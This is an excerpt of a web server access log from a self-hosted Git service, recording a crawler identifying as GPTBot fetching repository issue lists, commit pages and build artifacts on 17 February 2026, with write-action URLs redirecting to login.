"/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build" [Client 74.7.227.38] [Length 10182] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:18:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:18:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold_log_macros.hpp" [Client 74.7.227.38] [Length 23667] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13367] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:25:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" +[17/Feb/2026:18:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build" +[17/Feb/2026:18:25:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" +[17/Feb/2026:18:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build" +[17/Feb/2026:18:25:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" +[17/Feb/2026:18:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build" +[17/Feb/2026:18:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" +[17/Feb/2026:18:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 10900] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" +[17/Feb/2026:18:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 10894] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" +[17/Feb/2026:18:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 10895] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" +[17/Feb/2026:18:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 10892] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" +[17/Feb/2026:18:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13369] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 9795] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 9798] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 9795] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full" [Client 74.7.227.38] [Length 9799] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 11112] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 11113] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 11113] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:25:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 107388] [Gzip 18.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 109005] [Gzip 18.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 108622] [Gzip 18.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:26:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:26:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:26:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 